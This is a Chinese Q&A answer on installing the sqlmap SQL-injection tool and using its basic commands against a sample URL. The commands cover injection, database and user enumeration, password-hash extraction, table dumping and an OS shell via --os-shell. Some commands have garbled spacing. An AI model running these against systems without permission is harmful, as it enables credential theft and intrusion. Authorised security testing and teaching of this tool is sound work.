最佳答案

linux安装:
linux安装了git的话直接gitclone
//gitclonehttps://github.com/sqlmapproject/sqlmap.git
直接下载:
../sqlmap-master.zip
unzip./master.zip
windows下的安装
安装Python2.6然后设置环境变量。把python添加进去,比如我装到D:\Python26
就在path的最后加;D:\Python26
解压sqlmap到硬盘
比如D:/sqlmap,打开CMD,输入pythonD:\sqlmap\sqlmap.py就可以用了。
列几个基本命令
./sqlmap.py–h//查看帮助信息
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”//get注入
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”--data“DATA”//post注入
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”--cookie“COOKIE”//修改请求时的cookie
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”--dbs//列数据库
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”–-users//列用户
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”–-passwords//获取密码hash
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”–-tables-DDB_NAME//列DB_NAME的表
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”–-columns–TTB_NAME-DDB_NAME//读取TB_NAME中的列
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”–-dump–CC1,C2,C3–TTB_NAME-DDB_NAME//读字段C1,C2,C3数据
./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”–-os-shell//取得一个shell